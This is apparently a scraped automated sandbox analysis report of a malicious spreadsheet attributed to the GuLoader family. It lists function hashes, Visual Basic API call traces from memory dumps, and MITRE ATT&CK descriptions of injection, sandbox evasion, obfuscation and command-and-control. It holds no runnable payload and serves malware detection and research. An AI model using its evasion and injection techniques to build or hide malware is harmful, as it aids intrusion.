Instruction Fuzzy Hash: 5F51C6716117499FDF34CE2989E87EF72E3AF98740F64853ACD8D4B648D331AA818B41

Uniqueness

Uniqueness Score: -1.00%

Function 002F06D2, Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2351636945.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45d789d20f9cac5d38eefcbaf51c73f767d672af378f9952debfae1dafc0ae5d
Instruction ID: d352483b29b75882a6a10ede01b825c65ddc72b2b7db7116674311bee8bdaac0
Opcode Fuzzy Hash: 45d789d20f9cac5d38eefcbaf51c73f767d672af378f9952debfae1dafc0ae5d
Instruction Fuzzy Hash: 264188756183499FEB20AF74C8943EAB7A6BF55390F81013EDD8AE7245D3348985CB01

Uniqueness

Uniqueness Score: -1.00%

Function 002F824D, Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2351636945.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff3f68b16c4435a5aa8bfd4b900801464f91696f06a9092046d8b48ecf8cff6c
Instruction ID: 42e907360eb4146ce9ee2993567291bced7ad91e03acde81065822d0321e9e16
Opcode Fuzzy Hash: ff3f68b16c4435a5aa8bfd4b900801464f91696f06a9092046d8b48ecf8cff6c
Instruction Fuzzy Hash: 18514B72A042495BDF38CE39CDE43DAB7E3AFA5350F54813ECD8A87649D73089468611

Uniqueness

Uniqueness Score: -1.00%

Function 002F01DA, Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2351636945.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b0bc99db21b09dcbe5fdd0e13a933d1b4da8b1c3e9cdbda83ffc48ad4d79eff0
Instruction ID: 0619fc85569ee83ceb1bd292da0231ffd77e8fe801b48733557cdf84ef7b6b13
Opcode Fuzzy Hash: b0bc99db21b09dcbe5fdd0e13a933d1b4da8b1c3e9cdbda83ffc48ad4d79eff0
Instruction Fuzzy Hash: 30419774518309AFDB206E74CA453FEFBA2AF92390F554A1EEDC692049C73444D6CB07

Uniqueness

Uniqueness Score: -1.00%

Function 002F06E2, Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2351636945.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8eccaa7199b46b78c6d62186718d4ac9754d91c01ca1b4741306d5c844c85334
Instruction ID: 7a4d8ee5d4eb8b1441ddf52b309bd000b8a375fc8952f327e4c8da4cce7efde7
Opcode Fuzzy Hash: 8eccaa7199b46b78c6d62186718d4ac9754d91c01ca1b4741306d5c844c85334
Instruction Fuzzy Hash: 30416671618349AFEB21AF34C8953EBB7A6AF99380F82003DDD8997201D3348D85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 002F1207, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2351636945.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1badee8dc04b7aa1af46308dc0ed0db6263c58419099e973708fc19bc34d376e
Instruction ID: d0fd5ace132b1058a36b11827069ad034c7eb15be81cd0f5c40046a98539240e
Opcode Fuzzy Hash: 1badee8dc04b7aa1af46308dc0ed0db6263c58419099e973708fc19bc34d376e
Instruction Fuzzy Hash: 1E31E4309087CAABDB31DE3889093EEBFA1AF533A0F44839DCCD85B189C77556658742

Uniqueness

Uniqueness Score: -1.00%

Function 002F7AEF, Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2351636945.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5af2bb4017c9c660c9a50f256a6b3735298518f0701278b872d2299585de09bc
Instruction ID: e98110d121f1a1039240a72f1817acc0d682eef41222adb97eea63519748e15a
Opcode Fuzzy Hash: 5af2bb4017c9c660c9a50f256a6b3735298518f0701278b872d2299585de09bc
Instruction Fuzzy Hash: 932108726417498BDB3C8E399D357D733A3AF96360F55011FCC479B290DB718A868B01

Uniqueness

Uniqueness Score: -1.00%

Function 002F7AF5, Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2351636945.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d96bb69e24e1c0169fd5fddcbacbabc75cfdf79eb6319402438111e3cffb50d
Instruction ID: cf99f5770863d47bdbb8d806ba56d9699ecd90b978664d2a0e17a67fadab455a
Opcode Fuzzy Hash: 1d96bb69e24e1c0169fd5fddcbacbabc75cfdf79eb6319402438111e3cffb50d
Instruction Fuzzy Hash: 682128726427498BDB388E399D357D723A3AFD6360F55021FCC479B290DB318A828B01

Uniqueness

Uniqueness Score: -1.00%

Function 002F6F73, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2351636945.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa83f115d32044355829f99e981b356408b8d06709f15d5cce941108ef1eed5b
Instruction ID: 6366d9d3c4bd8f1eed76537834b5eecc42e854268bba9c7e05ea5b0f1f9f135b
Opcode Fuzzy Hash: aa83f115d32044355829f99e981b356408b8d06709f15d5cce941108ef1eed5b
Instruction Fuzzy Hash: CC21063920835B8FCB24DE28D8E43EBA3E2EF5A340F894139DD46CB651E3718855C711

Uniqueness

Uniqueness Score: -1.00%

Function 002F51A4, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2351636945.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4842bf7027df32cb82c8e9838463c3e51f2283253d3ee2ae8d19cdf80b8c50d7
Instruction ID: ed2b79298e56401b78504ebe7ff0d28ad9977e444993535c194011e0635a379b
Opcode Fuzzy Hash: 4842bf7027df32cb82c8e9838463c3e51f2283253d3ee2ae8d19cdf80b8c50d7
Instruction Fuzzy Hash: 7F2106312443169FDB54AE398AE57FAB3E5BF25380F82092DCCEAC7565D7304A84CB02

Uniqueness

Uniqueness Score: -1.00%

Function 002F3EC0, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2351636945.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1400a60b3bbf9f008126e1f3da13e82bd57188f0276840059380fabb8fd4fced
Instruction ID: 9f367176b6b9d8e056b8de9349a54c9889a2f625758197b04ab9f6a2a4618b7d
Opcode Fuzzy Hash: 1400a60b3bbf9f008126e1f3da13e82bd57188f0276840059380fabb8fd4fced
Instruction Fuzzy Hash: 5611C1316483008FC7546E34C9922BEB7E1FF52350F5A0A1DDAD2421A5D37409C4DF03

Uniqueness

Uniqueness Score: -1.00%

Function 002F69D7, Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2351636945.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a64dc7cc7aa864ceacc254b461cc2535341bfc46b6ebebf4f21fdefa4c7475e
Instruction ID: 7b7a469c3d3d210196b53cac8caebc29c000275e0a57f9ba1e87e074728699cf
Opcode Fuzzy Hash: 5a64dc7cc7aa864ceacc254b461cc2535341bfc46b6ebebf4f21fdefa4c7475e
Instruction Fuzzy Hash: 30F0F63151024A4FDB325E50CC017EA72E7EF697B0F650129DD089B394EAF29E908640

Uniqueness

Uniqueness Score: -1.00%

Function 002F5022, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2351636945.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4294420f0826f5bc2c00e06abd4decf697420ef1cd01d96577d8ed4cd254c4d8
Instruction ID: 290ace613b6555900f67097c8ae28f80657543b550e837e1fe69e96cb1b7a3de
Opcode Fuzzy Hash: 4294420f0826f5bc2c00e06abd4decf697420ef1cd01d96577d8ed4cd254c4d8
Instruction Fuzzy Hash: 83C092FB202581CFEB41DB0CC491B8073A1FB24A48BC404A0E842CF71AC224ED41CB04

Uniqueness

Uniqueness Score: -1.00%

Function 002F6B34, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2351636945.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf9e92d1e5c217bc22db8f79576e66618c3505ccf5d32c72a7aeb542b96153fa
Instruction ID: 6949b9b75cd7542e4f557d30197da177321de833ab70246019129f7d803d9e86
Opcode Fuzzy Hash: bf9e92d1e5c217bc22db8f79576e66618c3505ccf5d32c72a7aeb542b96153fa
Instruction Fuzzy Hash: 41B092302A15808FCB45CE08C1C0E0073A1B744640B410880E001CBAA1C224EC00CA00

Uniqueness

Uniqueness Score: -1.00%

Function 00432934, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 198COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 0043298C
__vbaNew2.MSVBVM60(0042F948,00434454), ref: 004329A3
__vbaHresultCheckObj.MSVBVM60(00000000,0269F6F4,0042F938,00000014), ref: 004329C8
__vbaHresultCheckObj.MSVBVM60(00000000,?,0042F990,00000130), ref: 004329F8
__vbaStrMove.MSVBVM60(00000000,?,0042F990,00000130), ref: 00432A06
__vbaFreeObj.MSVBVM60(00000000,?,0042F990,00000130), ref: 00432A0E
#560.MSVBVM60(?), ref: 00432A1E
__vbaFreeVar.MSVBVM60(?), ref: 00432A34
__vbaNew2.MSVBVM60(0042F948,00434454,?), ref: 00432A54
__vbaHresultCheckObj.MSVBVM60(00000000,0269F6F4,0042F938,00000014), ref: 00432A74
__vbaHresultCheckObj.MSVBVM60(00000000,?,0042F990,00000130), ref: 00432A9D
__vbaStrMove.MSVBVM60(00000000,?,0042F990,00000130), ref: 00432AAB
__vbaFreeObj.MSVBVM60(00000000,?,0042F990,00000130), ref: 00432AB3
__vbaNew2.MSVBVM60(0042F948,00434454), ref: 00432ACA
__vbaObjVar.MSVBVM60(?), ref: 00432ADB
__vbaObjSetAddref.MSVBVM60(?,00000000,?), ref: 00432AE5
__vbaHresultCheckObj.MSVBVM60(00000000,0269F6F4,0042F938,00000010), ref: 00432AFC
__vbaFreeObj.MSVBVM60(00000000,0269F6F4,0042F938,00000010), ref: 00432B04
__vbaNew2.MSVBVM60(0042FCD4,`S`,?), ref: 00432B1C
__vbaObjSet.MSVBVM60(?,00000000), ref: 00432B34
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F980,00000198), ref: 00432B5A
__vbaFreeObj.MSVBVM60(00000000,00000000,0042F980,00000198), ref: 00432B68
__vbaFreeStr.MSVBVM60(00432BAE), ref: 00432B90
__vbaFreeStr.MSVBVM60(00432BAE), ref: 00432B98
__vbaFreeStr.MSVBVM60(00432BAE), ref: 00432BA0
__vbaFreeVar.MSVBVM60(00432BAE), ref: 00432BA8

Strings

`S`, xrefs: 00432B09, 00432B12, 00432B21

Memory Dump Source

Source File: 00000006.00000002.2351658606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2351652223.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2351682771.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2351688978.0000000000435000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Free$CheckHresult$New2$Move$#560AddrefCopy
String ID: `S`
API String ID: 4235209719-1806859773
Opcode ID: bcf8c706b99db04601c36676d24a6e41dfa079b5582be26c2304a3a11746a177
Instruction ID: c1423ce5c12b2c4b574031c65fe7a80395d619b9ed9ed082f72282d88b5a6126
Opcode Fuzzy Hash: bcf8c706b99db04601c36676d24a6e41dfa079b5582be26c2304a3a11746a177
Instruction Fuzzy Hash: D3618270E00219ABCB14EFA6D885EDEB7B8EF58304F50447EF111F71A1DA786909CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00432723, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 151COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0042FCD4,`S`), ref: 0043276F
__vbaObjSet.MSVBVM60(?,00000000), ref: 00432787
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042FB3C,00000134), ref: 004327C3
__vbaFreeObj.MSVBVM60(00000000,00000000,0042FB3C,00000134), ref: 004327CB
#696.MSVBVM60(0042FB50), ref: 004327D5
#704.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE,0042FB50), ref: 004327FB
__vbaStrMove.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE,0042FB50), ref: 00432805
__vbaFreeVar.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE,0042FB50), ref: 0043280D
__vbaNew2.MSVBVM60(0042FCD4,`S`,?,000000FF,000000FE,000000FE,000000FE,0042FB50), ref: 00432825
__vbaObjSet.MSVBVM60(?,00000000), ref: 0043283D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F980,00000170), ref: 00432863
#529.MSVBVM60(00000002), ref: 0043287D
__vbaFreeObj.MSVBVM60(00000002), ref: 00432885
__vbaFreeVar.MSVBVM60(00000002), ref: 0043288D
__vbaNew2.MSVBVM60(0042FCD4,`S`,0042FB50), ref: 004328A5
__vbaObjSet.MSVBVM60(?,00000000), ref: 004328BD
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F9C0,00000058), ref: 004328DD
__vbaFreeObj.MSVBVM60(00000000,00000000,0042F9C0,00000058), ref: 004328EB
__vbaFreeStr.MSVBVM60(00432919), ref: 00432913

Strings

`S`, xrefs: 0043274B, 00432765, 00432774, 00432812, 0043281B, 0043282A, 00432892, 0043289B, 004328AA

Memory Dump Source

Source File: 00000006.00000002.2351658606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2351652223.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2351682771.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2351688978.0000000000435000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Free$CheckHresultNew2$#529#696#704Move
String ID: `S`
API String ID: 640063502-1806859773
Opcode ID: d8fc5d446533a55316a0e307b3f28a11a38dc4499473a2e2492fc759b926a15a
Instruction ID: c2fda3f4506ae53223b19686265dfab4e0f721b73c1867d2d676e03128cc8d1a
Opcode Fuzzy Hash: d8fc5d446533a55316a0e307b3f28a11a38dc4499473a2e2492fc759b926a15a
Instruction Fuzzy Hash: 02511A70A00218ABCB14EBA6DD85FDE77B8AF08704F50067EF511F72E1DB7869058B68

Uniqueness

Uniqueness Score: -1.00%

Function 00432E13, Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 172COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0042F948,00434454), ref: 00432E5B
__vbaHresultCheckObj.MSVBVM60(00000000,0269F6F4,0042F938,00000014), ref: 00432E7F
__vbaNew2.MSVBVM60(0042FCD4,`S`), ref: 00432EA8
__vbaObjSet.MSVBVM60(?,00000000), ref: 00432EC0
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042FA38,0000013C), ref: 00432EE6
__vbaHresultCheckObj.MSVBVM60(00000000,?,0042F990,0000013C), ref: 00432F15
__vbaFreeStr.MSVBVM60 ref: 00432F1D
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00432F2E
__vbaNew2.MSVBVM60(0042FCD4,`S`), ref: 00432F49
__vbaObjSet.MSVBVM60(?,00000000), ref: 00432F61
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F980,000001D0), ref: 00432F99
__vbaFreeObj.MSVBVM60 ref: 00432FA1
__vbaNew2.MSVBVM60(0042FCD4,`S`), ref: 00432FB9
__vbaObjSet.MSVBVM60(?,00000000), ref: 00432FD1
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042F9E8,00000078), ref: 00432FF1
__vbaFreeObj.MSVBVM60 ref: 00432FFF

Strings

`S`, xrefs: 00432E84, 00432E9E, 00432EAD, 00432F33, 00432F3F, 00432F4E, 00432FA6, 00432FAF, 00432FBE

Memory Dump Source

Source File: 00000006.00000002.2351658606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2351652223.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2351682771.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2351688978.0000000000435000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckHresult$FreeNew2$List
String ID: `S`
API String ID: 3473554973-1806859773
Opcode ID: eb678c9f3d39e5a4f9df96214f3de4139dd66eaab9dd55ed8939619f27d39f79
Instruction ID: 30e5718719045ac056bf5e9e3402fd759a5bf7ce3b3457348a4afd3427220cf3
Opcode Fuzzy Hash: eb678c9f3d39e5a4f9df96214f3de4139dd66eaab9dd55ed8939619f27d39f79
Instruction Fuzzy Hash: 39515170A00214ABCB04EFA6DD86FEF77B8BF58704F50046AF510F7191D6B8A9058B68

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report new order requirment-21 July.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

Exploits:

System Summary:

Jbx Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "new order requirment-21 July.xlsx"

Indicators

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General